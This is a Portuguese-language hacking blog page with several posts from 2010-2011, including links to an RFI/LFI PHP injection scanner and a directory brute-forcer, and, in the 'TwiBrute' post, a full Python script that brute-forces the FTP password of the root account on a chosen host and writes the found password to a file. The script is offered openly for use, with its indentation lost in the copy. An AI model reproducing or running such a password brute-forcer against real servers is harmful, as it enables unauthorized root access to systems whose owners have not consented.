Contra Rippers

quinta-feira, 22 de dezembro de 2011

PHP Injection Scanner

2 comentários
http://tynipic.com/images/viu1324609191o.png

É um pouco antigo já, mas quem sabe pode ser útil para alguém.

Esse Tool utiliza as técnicas de RFI e LFI


Download aqui

quarta-feira, 30 de novembro de 2011

#Humor - Instalando Programas Linux

0 comentários

Sempre tem vacilação para instalar..

quarta-feira, 16 de novembro de 2011

#Paper - WinSocket em C

0 comentários
Bom gente abaixo segue um paper do Felix_Poison (faz tempo que não o vejo) que fala sobre winsocket, para quem não sabe é diferente programar socket em linux e windows.

#######################################################
##               NEMESIZ SECURITY GROUP              ##
##                www.nemesiz.forum.st               ##
##                                                   ##
##          Winsockets Em C - Por Felix_Poison       ##
#######################################################
                                                      !
#######################################################

domingo, 13 de novembro de 2011

Insecuritynet

0 comentários
Para não falarem que só estou postando merda (e estou).

Hoje me deparei com o site de um cara que conheci a muito tempo, alias do tempo que ele tinha um software "simples", alias o Insecuritynet 1.0 se não me engano.

Então ele desenvolve ferramentas em C++ grafico, bem daora pelo menos para mim.

quinta-feira, 27 de outubro de 2011

Hacker virando Banker

4 comentários
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVmgt7LJLEVK2Ya3324kYV4OD0DpqDDHlGrcwRhSL6nmcfqbeOJr4lyOpsWt9KYUEIQAlBZOj21wtSuIu3_zvTSskPj2RuCpGPOFVdSmSIuhdh-fbevTMKPaismr-pCV4ehiOrp6L66tU/s320/nerd.jpg

Todo jovenzinho começa no Hacketerismação e pensa que tudo vai ser fácil mas, descobre que seu conhecimento não serve de nada sem um diploma, o FBI não irá lhe contratar se você invadir o sistema deles.

terça-feira, 2 de agosto de 2011

Diretory Find

0 comentários
Encontre diretorio por brute-force. Muitas vezes wordlist não é suficiente para achar então é necessário que use todas as combinações possíveis.

http://i55.tinypic.com/dllqgw.png
Imagem By Nyuu

sexta-feira, 21 de maio de 2010

TwiBrute

0 comentários


Bom, vou postar aqui pra vocês um script que eu fez faz tempo, que quebra senhas por combinação de FTP.
Sabemos que é bem dificil encontrar um desse na internet, um dos motivos pelo qual eu fiz, então espero que não me rippem.
Dois campos que podem ser alterados no codigo são esse:

user = "root" // Coloquei root, pois conseguindo essa senha você ja consegue o root no sistema

chars = "abcdefghijklmnopqrstuvxwyz0123456789" // Os caracteres que ele usará para quebrar a senha.

#!/usr/bin/python

import socket
import sys, string
from itertools import product



if len(sys.argv) !=3:
print("Usage: "+ sys.argv[0] + " ")
print("Ex: "+ sys.argv[0] + " 127.0.0.1 7")
sys.exit(1)

img = """

______ __ __ ____ ____ ____ __ __ ______ ___
| T| T__T Tl j | \ | \ | T T| T / _]
| || | | | | T | o )| D )| | || | / [_
l_j l_j| | | | | | | T| / | | |l_j l_jY _]
| | l ` ' ! | | | O || \ | : | | | | [_
| | \ / j l | || . Yl | | | | T
l__j \_/\_/ |____j l_____jl__j\_j \__,_j l__j l_____j


Coded By Twi John


"""

host = sys.argv[1]
user = "root"
chars = "abcdefghijklmnopqrstuvxwyz0123456789"

print (img)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

x = False
erro = ""

s.connect((host, 21))
s.recv(1024)
while x != True:
MAX_CHARS = int(sys.argv[2])
for nletters in range(MAX_CHARS):
for word in product(chars, repeat=nletters + 1):
try:
s.send("USER " + user +"\r\n")
s.recv(1024)
s.send('PASS '+''.join(word)+'\r\n')
print(''.join(word))
password = (''.join(word)+'\n')
erro = s.recv(3)
if erro == "230":
x = True
print("Password :"+ password)
f = open("userpass.txt","w")
f.write("Password :"+ password)
sys.exit(2)
except socket.error:
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,21))
s.send("USER " + user +"\r\n")
s.recv(1024)
s.send('PASS '+''.join(word)+'\r\n')
print(''.join(word))
password = (''.join(word)+'\n')
erro = s.recv(3)
if erro == "230":
x = True
print("Password :"+ password)
f = open("userpass.txt","w")
f.write("Password :"+ password)
sys.exit(2)